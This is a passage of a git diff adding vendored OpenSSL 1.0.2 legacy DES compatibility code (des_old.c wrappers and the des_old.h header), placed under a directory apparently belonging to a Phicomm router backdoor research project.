+    DES_xcbc_encrypt((unsigned char *)input, (unsigned char *)output,
+                     length, (DES_key_schedule *)schedule, ivec, inw, outw,
+                     enc);
+}
+
+void _ossl_old_des_cfb_encrypt(unsigned char *in, unsigned char *out,
+                               int numbits, long length,
+                               des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec, int enc)
+{
+    DES_cfb_encrypt(in, out, numbits, length,
+                    (DES_key_schedule *)schedule, ivec, enc);
+}
+
+void _ossl_old_des_ecb_encrypt(_ossl_old_des_cblock *input,
+                               _ossl_old_des_cblock *output,
+                               des_key_schedule ks, int enc)
+{
+    DES_ecb_encrypt(input, output, (DES_key_schedule *)ks, enc);
+}
+
+void _ossl_old_des_encrypt(DES_LONG *data, des_key_schedule ks, int enc)
+{
+    DES_encrypt1(data, (DES_key_schedule *)ks, enc);
+}
+
+void _ossl_old_des_encrypt2(DES_LONG *data, des_key_schedule ks, int enc)
+{
+    DES_encrypt2(data, (DES_key_schedule *)ks, enc);
+}
+
+void _ossl_old_des_encrypt3(DES_LONG *data, des_key_schedule ks1,
+                            des_key_schedule ks2, des_key_schedule ks3)
+{
+    DES_encrypt3(data, (DES_key_schedule *)ks1, (DES_key_schedule *)ks2,
+                 (DES_key_schedule *)ks3);
+}
+
+void _ossl_old_des_decrypt3(DES_LONG *data, des_key_schedule ks1,
+                            des_key_schedule ks2, des_key_schedule ks3)
+{
+    DES_decrypt3(data, (DES_key_schedule *)ks1, (DES_key_schedule *)ks2,
+                 (DES_key_schedule *)ks3);
+}
+
+void _ossl_old_des_ede3_cbc_encrypt(_ossl_old_des_cblock *input,
+                                    _ossl_old_des_cblock *output, long length,
+                                    des_key_schedule ks1,
+                                    des_key_schedule ks2,
+                                    des_key_schedule ks3,
+                                    _ossl_old_des_cblock *ivec, int enc)
+{
+    DES_ede3_cbc_encrypt((unsigned char *)input, (unsigned char *)output,
+                         length, (DES_key_schedule *)ks1,
+                         (DES_key_schedule *)ks2, (DES_key_schedule *)ks3,
+                         ivec, enc);
+}
+
+void _ossl_old_des_ede3_cfb64_encrypt(unsigned char *in, unsigned char *out,
+                                      long length, des_key_schedule ks1,
+                                      des_key_schedule ks2,
+                                      des_key_schedule ks3,
+                                      _ossl_old_des_cblock *ivec, int *num,
+                                      int enc)
+{
+    DES_ede3_cfb64_encrypt(in, out, length,
+                           (DES_key_schedule *)ks1, (DES_key_schedule *)ks2,
+                           (DES_key_schedule *)ks3, ivec, num, enc);
+}
+
+void _ossl_old_des_ede3_ofb64_encrypt(unsigned char *in, unsigned char *out,
+                                      long length, des_key_schedule ks1,
+                                      des_key_schedule ks2,
+                                      des_key_schedule ks3,
+                                      _ossl_old_des_cblock *ivec, int *num)
+{
+    DES_ede3_ofb64_encrypt(in, out, length,
+                           (DES_key_schedule *)ks1, (DES_key_schedule *)ks2,
+                           (DES_key_schedule *)ks3, ivec, num);
+}
+
+#if 0                           /* broken code, preserved just in case anyone
+                                 * specifically looks for this */
+void _ossl_old_des_xwhite_in2out(_ossl_old_des_cblock (*des_key),
+                                 _ossl_old_des_cblock (*in_white),
+                                 _ossl_old_des_cblock (*out_white))
+{
+    DES_xwhite_in2out(des_key, in_white, out_white);
+}
+#endif
+
+int _ossl_old_des_enc_read(int fd, char *buf, int len, des_key_schedule sched,
+                           _ossl_old_des_cblock *iv)
+{
+    return DES_enc_read(fd, buf, len, (DES_key_schedule *)sched, iv);
+}
+
+int _ossl_old_des_enc_write(int fd, char *buf, int len,
+                            des_key_schedule sched, _ossl_old_des_cblock *iv)
+{
+    return DES_enc_write(fd, buf, len, (DES_key_schedule *)sched, iv);
+}
+
+char *_ossl_old_des_fcrypt(const char *buf, const char *salt, char *ret)
+{
+    return DES_fcrypt(buf, salt, ret);
+}
+
+char *_ossl_old_des_crypt(const char *buf, const char *salt)
+{
+    return DES_crypt(buf, salt);
+}
+
+char *_ossl_old_crypt(const char *buf, const char *salt)
+{
+    return DES_crypt(buf, salt);
+}
+
+void _ossl_old_des_ofb_encrypt(unsigned char *in, unsigned char *out,
+                               int numbits, long length,
+                               des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec)
+{
+    DES_ofb_encrypt(in, out, numbits, length, (DES_key_schedule *)schedule,
+                    ivec);
+}
+
+void _ossl_old_des_pcbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec, int enc)
+{
+    DES_pcbc_encrypt((unsigned char *)input, (unsigned char *)output,
+                     length, (DES_key_schedule *)schedule, ivec, enc);
+}
+
+DES_LONG _ossl_old_des_quad_cksum(_ossl_old_des_cblock *input,
+                                  _ossl_old_des_cblock *output, long length,
+                                  int out_count, _ossl_old_des_cblock *seed)
+{
+    return DES_quad_cksum((unsigned char *)input, output, length,
+                          out_count, seed);
+}
+
+void _ossl_old_des_random_seed(_ossl_old_des_cblock key)
+{
+    RAND_seed(key, sizeof(_ossl_old_des_cblock));
+}
+
+void _ossl_old_des_random_key(_ossl_old_des_cblock ret)
+{
+    DES_random_key((DES_cblock *)ret);
+}
+
+int _ossl_old_des_read_password(_ossl_old_des_cblock *key, const char *prompt,
+                                int verify)
+{
+    return DES_read_password(key, prompt, verify);
+}
+
+int _ossl_old_des_read_2passwords(_ossl_old_des_cblock *key1,
+                                  _ossl_old_des_cblock *key2,
+                                  const char *prompt, int verify)
+{
+    return DES_read_2passwords(key1, key2, prompt, verify);
+}
+
+void _ossl_old_des_set_odd_parity(_ossl_old_des_cblock *key)
+{
+    DES_set_odd_parity(key);
+}
+
+int _ossl_old_des_is_weak_key(_ossl_old_des_cblock *key)
+{
+    return DES_is_weak_key(key);
+}
+
+int _ossl_old_des_set_key(_ossl_old_des_cblock *key,
+                          des_key_schedule schedule)
+{
+    return DES_set_key(key, (DES_key_schedule *)schedule);
+}
+
+int _ossl_old_des_key_sched(_ossl_old_des_cblock *key,
+                            des_key_schedule schedule)
+{
+    return DES_key_sched(key, (DES_key_schedule *)schedule);
+}
+
+void _ossl_old_des_string_to_key(char *str, _ossl_old_des_cblock *key)
+{
+    DES_string_to_key(str, key);
+}
+
+void _ossl_old_des_string_to_2keys(char *str, _ossl_old_des_cblock *key1,
+                                   _ossl_old_des_cblock *key2)
+{
+    DES_string_to_2keys(str, key1, key2);
+}
+
+void _ossl_old_des_cfb64_encrypt(unsigned char *in, unsigned char *out,
+                                 long length, des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec, int *num,
+                                 int enc)
+{
+    DES_cfb64_encrypt(in, out, length, (DES_key_schedule *)schedule,
+                      ivec, num, enc);
+}
+
+void _ossl_old_des_ofb64_encrypt(unsigned char *in, unsigned char *out,
+                                 long length, des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec, int *num)
+{
+    DES_ofb64_encrypt(in, out, length, (DES_key_schedule *)schedule,
+                      ivec, num);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.h
new file mode 100644
index 0000000..f1e1e2c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.h
@@ -0,0 +1,497 @@
+/* crypto/des/des_old.h -*- mode:C; c-file-style: "eay" -*- */
+
+/*-
+ * WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
+ *
+ * The function names in here are deprecated and are only present to
+ * provide an interface compatible with openssl 0.9.6 and older as
+ * well as libdes.  OpenSSL now provides functions where "des_" has
+ * been replaced with "DES_" in the names, to make it possible to
+ * make incompatible changes that are needed for C type security and
+ * other stuff.
+ *
+ * This include files has two compatibility modes:
+ *
+ *   - If OPENSSL_DES_LIBDES_COMPATIBILITY is defined, you get an API
+ *     that is compatible with libdes and SSLeay.
+ *   - If OPENSSL_DES_LIBDES_COMPATIBILITY isn't defined, you get an
+ *     API that is compatible with OpenSSL 0.9.5x to 0.9.6x.
+ *
+ * Note that these modes break earlier snapshots of OpenSSL, where
+ * libdes compatibility was the only available mode or (later on) the
+ * prefered compatibility mode.  However, after much consideration
+ * (and more or less violent discussions with external parties), it
+ * was concluded that OpenSSL should be compatible with earlier versions
+ * of itself before anything else.  Also, in all honesty, libdes is
+ * an old beast that shouldn't really be used any more.
+ *
+ * Please consider starting to use the DES_ functions rather than the
+ * des_ ones.  The des_ functions will disappear completely before
+ * OpenSSL 1.0!
+ *
+ * WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
+ */
+
+/*
+ * Written by Richard Levitte (richard@levitte.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_DES_H
+# define HEADER_DES_H
+
+# include <openssl/e_os2.h>     /* OPENSSL_EXTERN, OPENSSL_NO_DES, DES_LONG */
+
+# ifdef OPENSSL_NO_DES
+#  error DES is disabled.
+# endif
+
+# ifndef HEADER_NEW_DES_H
+#  error You must include des.h, not des_old.h directly.
+# endif
+
+# ifdef _KERBEROS_DES_H
+#  error <openssl/des_old.h> replaces <kerberos/des.h>.
+# endif
+
+# include <openssl/symhacks.h>
+
+# ifdef OPENSSL_BUILD_SHLIBCRYPTO
+#  undef OPENSSL_EXTERN
+#  define OPENSSL_EXTERN OPENSSL_EXPORT
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef _
+#  undef _
+# endif
+
+typedef unsigned char _ossl_old_des_cblock[8];
+typedef struct _ossl_old_des_ks_struct {
+    union {
+        _ossl_old_des_cblock _;
+        /*
+         * make sure things are correct size on machines with 8 byte longs
+         */
+        DES_LONG pad[2];
+    } ks;
+} _ossl_old_des_key_schedule[16];
+
+# ifndef OPENSSL_DES_LIBDES_COMPATIBILITY
+#  define des_cblock DES_cblock
+#  define const_des_cblock const_DES_cblock
+#  define des_key_schedule DES_key_schedule
+#  define des_ecb3_encrypt(i,o,k1,k2,k3,e)\
+        DES_ecb3_encrypt((i),(o),&(k1),&(k2),&(k3),(e))
+#  define des_ede3_cbc_encrypt(i,o,l,k1,k2,k3,iv,e)\
+        DES_ede3_cbc_encrypt((i),(o),(l),&(k1),&(k2),&(k3),(iv),(e))
+#  define des_ede3_cbcm_encrypt(i,o,l,k1,k2,k3,iv1,iv2,e)\
+        DES_ede3_cbcm_encrypt((i),(o),(l),&(k1),&(k2),&(k3),(iv1),(iv2),(e))
+#  define des_ede3_cfb64_encrypt(i,o,l,k1,k2,k3,iv,n,e)\
+        DES_ede3_cfb64_encrypt((i),(o),(l),&(k1),&(k2),&(k3),(iv),(n),(e))
+#  define des_ede3_ofb64_encrypt(i,o,l,k1,k2,k3,iv,n)\
+        DES_ede3_ofb64_encrypt((i),(o),(l),&(k1),&(k2),&(k3),(iv),(n))
+#  define des_options()\
+        DES_options()
+#  define des_cbc_cksum(i,o,l,k,iv)\
+        DES_cbc_cksum((i),(o),(l),&(k),(iv))
+#  define des_cbc_encrypt(i,o,l,k,iv,e)\
+        DES_cbc_encrypt((i),(o),(l),&(k),(iv),(e))
+#  define des_ncbc_encrypt(i,o,l,k,iv,e)\
+        DES_ncbc_encrypt((i),(o),(l),&(k),(iv),(e))
+#  define des_xcbc_encrypt(i,o,l,k,iv,inw,outw,e)\
+        DES_xcbc_encrypt((i),(o),(l),&(k),(iv),(inw),(outw),(e))
+#  define des_cfb_encrypt(i,o,n,l,k,iv,e)\
+        DES_cfb_encrypt((i),(o),(n),(l),&(k),(iv),(e))
+#  define des_ecb_encrypt(i,o,k,e)\
+        DES_ecb_encrypt((i),(o),&(k),(e))
+#  define des_encrypt1(d,k,e)\
+        DES_encrypt1((d),&(k),(e))
+#  define des_encrypt2(d,k,e)\
+        DES_encrypt2((d),&(k),(e))
+#  define des_encrypt3(d,k1,k2,k3)\
+        DES_encrypt3((d),&(k1),&(k2),&(k3))
+#  define des_decrypt3(d,k1,k2,k3)\
+        DES_decrypt3((d),&(k1),&(k2),&(k3))
+#  define des_xwhite_in2out(k,i,o)\
+        DES_xwhite_in2out((k),(i),(o))
+#  define des_enc_read(f,b,l,k,iv)\
+        DES_enc_read((f),(b),(l),&(k),(iv))
+#  define des_enc_write(f,b,l,k,iv)\
+        DES_enc_write((f),(b),(l),&(k),(iv))
+#  define des_fcrypt(b,s,r)\
+        DES_fcrypt((b),(s),(r))
+#  if 0
+#   define des_crypt(b,s)\
+        DES_crypt((b),(s))
+#   if !defined(PERL5) && !defined(__FreeBSD__) && !defined(NeXT) && !defined(__OpenBSD__)
+#    define crypt(b,s)\
+        DES_crypt((b),(s))
+#   endif
+#  endif
+#  define des_ofb_encrypt(i,o,n,l,k,iv)\
+        DES_ofb_encrypt((i),(o),(n),(l),&(k),(iv))
+#  define des_pcbc_encrypt(i,o,l,k,iv,e)\
+        DES_pcbc_encrypt((i),(o),(l),&(k),(iv),(e))
+#  define des_quad_cksum(i,o,l,c,s)\
+        DES_quad_cksum((i),(o),(l),(c),(s))
+#  define des_random_seed(k)\
+        _ossl_096_des_random_seed((k))
+#  define des_random_key(r)\
+        DES_random_key((r))
+#  define des_read_password(k,p,v) \
+        DES_read_password((k),(p),(v))
+#  define des_read_2passwords(k1,k2,p,v) \
+        DES_read_2passwords((k1),(k2),(p),(v))
+#  define des_set_odd_parity(k)\
+        DES_set_odd_parity((k))
+#  define des_check_key_parity(k)\
+        DES_check_key_parity((k))
+#  define des_is_weak_key(k)\
+        DES_is_weak_key((k))
+#  define des_set_key(k,ks)\
+        DES_set_key((k),&(ks))
+#  define des_key_sched(k,ks)\
+        DES_key_sched((k),&(ks))
+#  define des_set_key_checked(k,ks)\
+        DES_set_key_checked((k),&(ks))
+#  define des_set_key_unchecked(k,ks)\
+        DES_set_key_unchecked((k),&(ks))
+#  define des_string_to_key(s,k)\
+        DES_string_to_key((s),(k))
+#  define des_string_to_2keys(s,k1,k2)\
+        DES_string_to_2keys((s),(k1),(k2))
+#  define des_cfb64_encrypt(i,o,l,ks,iv,n,e)\
+        DES_cfb64_encrypt((i),(o),(l),&(ks),(iv),(n),(e))
+#  define des_ofb64_encrypt(i,o,l,ks,iv,n)\
+        DES_ofb64_encrypt((i),(o),(l),&(ks),(iv),(n))
+
+#  define des_ecb2_encrypt(i,o,k1,k2,e) \
+        des_ecb3_encrypt((i),(o),(k1),(k2),(k1),(e))
+
+#  define des_ede2_cbc_encrypt(i,o,l,k1,k2,iv,e) \
+        des_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(e))
+
+#  define des_ede2_cfb64_encrypt(i,o,l,k1,k2,iv,n,e) \
+        des_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n),(e))
+
+#  define des_ede2_ofb64_encrypt(i,o,l,k1,k2,iv,n) \
+        des_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n))
+
+#  define des_check_key DES_check_key
+#  define des_rw_mode DES_rw_mode
+# else                          /* libdes compatibility */
+/*
+ * Map all symbol names to _ossl_old_des_* form, so we avoid all clashes with
+ * libdes
+ */
+#  define des_cblock _ossl_old_des_cblock
+#  define des_key_schedule _ossl_old_des_key_schedule
+#  define des_ecb3_encrypt(i,o,k1,k2,k3,e)\
+        _ossl_old_des_ecb3_encrypt((i),(o),(k1),(k2),(k3),(e))
+#  define des_ede3_cbc_encrypt(i,o,l,k1,k2,k3,iv,e)\
+        _ossl_old_des_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k3),(iv),(e))
+#  define des_ede3_cfb64_encrypt(i,o,l,k1,k2,k3,iv,n,e)\
+        _ossl_old_des_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k3),(iv),(n),(e))
+#  define des_ede3_ofb64_encrypt(i,o,l,k1,k2,k3,iv,n)\
+        _ossl_old_des_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k3),(iv),(n))
+#  define des_options()\
+        _ossl_old_des_options()
+#  define des_cbc_cksum(i,o,l,k,iv)\
+        _ossl_old_des_cbc_cksum((i),(o),(l),(k),(iv))
+#  define des_cbc_encrypt(i,o,l,k,iv,e)\
+        _ossl_old_des_cbc_encrypt((i),(o),(l),(k),(iv),(e))
+#  define des_ncbc_encrypt(i,o,l,k,iv,e)\
+        _ossl_old_des_ncbc_encrypt((i),(o),(l),(k),(iv),(e))
+#  define des_xcbc_encrypt(i,o,l,k,iv,inw,outw,e)\
+        _ossl_old_des_xcbc_encrypt((i),(o),(l),(k),(iv),(inw),(outw),(e))
+#  define des_cfb_encrypt(i,o,n,l,k,iv,e)\
+        _ossl_old_des_cfb_encrypt((i),(o),(n),(l),(k),(iv),(e))
+#  define des_ecb_encrypt(i,o,k,e)\
+        _ossl_old_des_ecb_encrypt((i),(o),(k),(e))
+#  define des_encrypt(d,k,e)\
+        _ossl_old_des_encrypt((d),(k),(e))
+#  define des_encrypt2(d,k,e)\
+        _ossl_old_des_encrypt2((d),(k),(e))
+#  define des_encrypt3(d,k1,k2,k3)\
+        _ossl_old_des_encrypt3((d),(k1),(k2),(k3))
+#  define des_decrypt3(d,k1,k2,k3)\
+        _ossl_old_des_decrypt3((d),(k1),(k2),(k3))
+#  define des_xwhite_in2out(k,i,o)\
+        _ossl_old_des_xwhite_in2out((k),(i),(o))
+#  define des_enc_read(f,b,l,k,iv)\
+        _ossl_old_des_enc_read((f),(b),(l),(k),(iv))
+#  define des_enc_write(f,b,l,k,iv)\
+        _ossl_old_des_enc_write((f),(b),(l),(k),(iv))
+#  define des_fcrypt(b,s,r)\
+        _ossl_old_des_fcrypt((b),(s),(r))
+#  define des_crypt(b,s)\
+        _ossl_old_des_crypt((b),(s))
+#  if 0
+#   define crypt(b,s)\
+        _ossl_old_crypt((b),(s))
+#  endif
+#  define des_ofb_encrypt(i,o,n,l,k,iv)\
+        _ossl_old_des_ofb_encrypt((i),(o),(n),(l),(k),(iv))
+#  define des_pcbc_encrypt(i,o,l,k,iv,e)\
+        _ossl_old_des_pcbc_encrypt((i),(o),(l),(k),(iv),(e))
+#  define des_quad_cksum(i,o,l,c,s)\
+        _ossl_old_des_quad_cksum((i),(o),(l),(c),(s))
+#  define des_random_seed(k)\
+        _ossl_old_des_random_seed((k))
+#  define des_random_key(r)\
+        _ossl_old_des_random_key((r))
+#  define des_read_password(k,p,v) \
+        _ossl_old_des_read_password((k),(p),(v))
+#  define des_read_2passwords(k1,k2,p,v) \
+        _ossl_old_des_read_2passwords((k1),(k2),(p),(v))
+#  define des_set_odd_parity(k)\
+        _ossl_old_des_set_odd_parity((k))
+#  define des_is_weak_key(k)\
+        _ossl_old_des_is_weak_key((k))
+#  define des_set_key(k,ks)\
+        _ossl_old_des_set_key((k),(ks))
+#  define des_key_sched(k,ks)\
+        _ossl_old_des_key_sched((k),(ks))
+#  define des_string_to_key(s,k)\
+        _ossl_old_des_string_to_key((s),(k))
+#  define des_string_to_2keys(s,k1,k2)\
+        _ossl_old_des_string_to_2keys((s),(k1),(k2))
+#  define des_cfb64_encrypt(i,o,l,ks,iv,n,e)\
+        _ossl_old_des_cfb64_encrypt((i),(o),(l),(ks),(iv),(n),(e))
+#  define des_ofb64_encrypt(i,o,l,ks,iv,n)\
+        _ossl_old_des_ofb64_encrypt((i),(o),(l),(ks),(iv),(n))
+
+#  define des_ecb2_encrypt(i,o,k1,k2,e) \
+        des_ecb3_encrypt((i),(o),(k1),(k2),(k1),(e))
+
+#  define des_ede2_cbc_encrypt(i,o,l,k1,k2,iv,e) \
+        des_ede3_cbc_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(e))
+
+#  define des_ede2_cfb64_encrypt(i,o,l,k1,k2,iv,n,e) \
+        des_ede3_cfb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n),(e))
+
+#  define des_ede2_ofb64_encrypt(i,o,l,k1,k2,iv,n) \
+        des_ede3_ofb64_encrypt((i),(o),(l),(k1),(k2),(k1),(iv),(n))
+
+#  define des_check_key DES_check_key
+#  define des_rw_mode DES_rw_mode
+# endif
+
+const char *_ossl_old_des_options(void);
+void _ossl_old_des_ecb3_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output,
+                                _ossl_old_des_key_schedule ks1,
+                                _ossl_old_des_key_schedule ks2,
+                                _ossl_old_des_key_schedule ks3, int enc);
+DES_LONG _ossl_old_des_cbc_cksum(_ossl_old_des_cblock *input,
+                                 _ossl_old_des_cblock *output, long length,
+                                 _ossl_old_des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec);
+void _ossl_old_des_cbc_encrypt(_ossl_old_des_cblock *input,
+                               _ossl_old_des_cblock *output, long length,
+                               _ossl_old_des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec, int enc);
+void _ossl_old_des_ncbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                _ossl_old_des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec, int enc);
+void _ossl_old_des_xcbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                _ossl_old_des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec,
+                                _ossl_old_des_cblock *inw,
+                                _ossl_old_des_cblock *outw, int enc);
+void _ossl_old_des_cfb_encrypt(unsigned char *in, unsigned char *out,
+                               int numbits, long length,
+                               _ossl_old_des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec, int enc);
+void _ossl_old_des_ecb_encrypt(_ossl_old_des_cblock *input,
+                               _ossl_old_des_cblock *output,
+                               _ossl_old_des_key_schedule ks, int enc);
+void _ossl_old_des_encrypt(DES_LONG *data, _ossl_old_des_key_schedule ks,
+                           int enc);
+void _ossl_old_des_encrypt2(DES_LONG *data, _ossl_old_des_key_schedule ks,
+                            int enc);
+void _ossl_old_des_encrypt3(DES_LONG *data, _ossl_old_des_key_schedule ks1,
+                            _ossl_old_des_key_schedule ks2,
+                            _ossl_old_des_key_schedule ks3);
+void _ossl_old_des_decrypt3(DES_LONG *data, _ossl_old_des_key_schedule ks1,
+                            _ossl_old_des_key_schedule ks2,
+                            _ossl_old_des_key_schedule ks3);
+void _ossl_old_des_ede3_cbc_encrypt(_ossl_old_des_cblock *input,
+                                    _ossl_old_des_cblock *output, long length,
+                                    _ossl_old_des_key_schedule ks1,
+                                    _ossl_old_des_key_schedule ks2,
+                                    _ossl_old_des_key_schedule ks3,
+                                    _ossl_old_des_cblock *ivec, int enc);
+void _ossl_old_des_ede3_cfb64_encrypt(unsigned char *in, unsigned char *out,
+                                      long length,
+                                      _ossl_old_des_key_schedule ks1,
+                                      _ossl_old_des_key_schedule ks2,
+                                      _ossl_old_des_key_schedule ks3,
+                                      _ossl_old_des_cblock *ivec, int *num,
+                                      int enc);
+void _ossl_old_des_ede3_ofb64_encrypt(unsigned char *in, unsigned char *out,
+                                      long length,
+                                      _ossl_old_des_key_schedule ks1,
+                                      _ossl_old_des_key_schedule ks2,
+                                      _ossl_old_des_key_schedule ks3,
+                                      _ossl_old_des_cblock *ivec, int *num);
+# if 0
+void _ossl_old_des_xwhite_in2out(_ossl_old_des_cblock (*des_key),
+                                 _ossl_old_des_cblock (*in_white),
+                                 _ossl_old_des_cblock (*out_white));
+# endif
+
+int _ossl_old_des_enc_read(int fd, char *buf, int len,
+                           _ossl_old_des_key_schedule sched,
+                           _ossl_old_des_cblock *iv);
+int _ossl_old_des_enc_write(int fd, char *buf, int len,
+                            _ossl_old_des_key_schedule sched,
+                            _ossl_old_des_cblock *iv);
+char *_ossl_old_des_fcrypt(const char *buf, const char *salt, char *ret);
+char *_ossl_old_des_crypt(const char *buf, const char *salt);
+# if !defined(PERL5) && !defined(NeXT)
+char *_ossl_old_crypt(const char *buf, const char *salt);
+# endif
+void _ossl_old_des_ofb_encrypt(unsigned char *in, unsigned char *out,
+                               int numbits, long length,
+                               _ossl_old_des_key_schedule schedule,
+                               _ossl_old_des_cblock *ivec);
+void _ossl_old_des_pcbc_encrypt(_ossl_old_des_cblock *input,
+                                _ossl_old_des_cblock *output, long length,
+                                _ossl_old_des_key_schedule schedule,
+                                _ossl_old_des_cblock *ivec, int enc);
+DES_LONG _ossl_old_des_quad_cksum(_ossl_old_des_cblock *input,
+                                  _ossl_old_des_cblock *output, long length,
+                                  int out_count, _ossl_old_des_cblock *seed);
+void _ossl_old_des_random_seed(_ossl_old_des_cblock key);
+void _ossl_old_des_random_key(_ossl_old_des_cblock ret);
+int _ossl_old_des_read_password(_ossl_old_des_cblock *key, const char *prompt,
+                                int verify);
+int _ossl_old_des_read_2passwords(_ossl_old_des_cblock *key1,
+                                  _ossl_old_des_cblock *key2,
+                                  const char *prompt, int verify);
+void _ossl_old_des_set_odd_parity(_ossl_old_des_cblock *key);
+int _ossl_old_des_is_weak_key(_ossl_old_des_cblock *key);
+int _ossl_old_des_set_key(_ossl_old_des_cblock *key,
+                          _ossl_old_des_key_schedule schedule);
+int _ossl_old_des_key_sched(_ossl_old_des_cblock *key,
+                            _ossl_old_des_key_schedule schedule);
+void _ossl_old_des_string_to_key(char *str, _ossl_old_des_cblock *key);
+void _ossl_old_des_string_to_2keys(char *str, _ossl_old_des_cblock *key1,
+                                   _ossl_old_des_cblock *key2);
+void _ossl_old_des_cfb64_encrypt(unsigned char *in, unsigned char *out,
+                                 long length,
+                                 _ossl_old_des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec, int *num,
+                                 int enc);
+void _ossl_old_des_ofb64_encrypt(unsigned char *in, unsigned char *out,
+                                 long length,
+                                 _ossl_old_des_key_schedule schedule,
+                                 _ossl_old_des_cblock *ivec, int *num);
+
+void _ossl_096_des_random_seed(des_cblock *key);
+
+/*
+ * The following definitions provide compatibility with the MIT Kerberos
+ * library. The _ossl_old_des_key_schedule structure is not binary
+ * compatible.
+ */
+
+# define _KERBEROS_DES_H
+
+# define KRBDES_ENCRYPT DES_ENCRYPT
+# define KRBDES_DECRYPT DES_DECRYPT
+
+# ifdef KERBEROS
+#  define ENCRYPT DES_ENCRYPT
+#  define DECRYPT DES_DECRYPT
+# endif
+
+# ifndef NCOMPAT
+#  define C_Block des_cblock
+#  define Key_schedule des_key_schedule
+#  define KEY_SZ DES_KEY_SZ
+#  define string_to_key des_string_to_key
+#  define read_pw_string des_read_pw_string
+#  define random_key des_random_key
+#  define pcbc_encrypt des_pcbc_encrypt
+#  define set_key des_set_key
+#  define key_sched des_key_sched
+#  define ecb_encrypt des_ecb_encrypt
+#  define cbc_encrypt des_cbc_encrypt
+#  define ncbc_encrypt des_ncbc_encrypt
+#  define xcbc_encrypt des_xcbc_encrypt
+#  define cbc_cksum des_cbc_cksum
+#  define quad_cksum des_quad_cksum
+#  define check_parity des_check_key_parity
+# endif
+
+# define des_fixup_key_parity DES_fixup_key_parity
+
+#ifdef  __cplusplus
+}
+#endif
+
+/* for DES_read_pw_string et al */
+# include <openssl/ui_compat.h>
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_old.o
new file mode 100644
index 0000000000000000000000000000000000000000..e1e587638086596000568d11ef09c7554663ccae
GIT binary patch
literal 7184
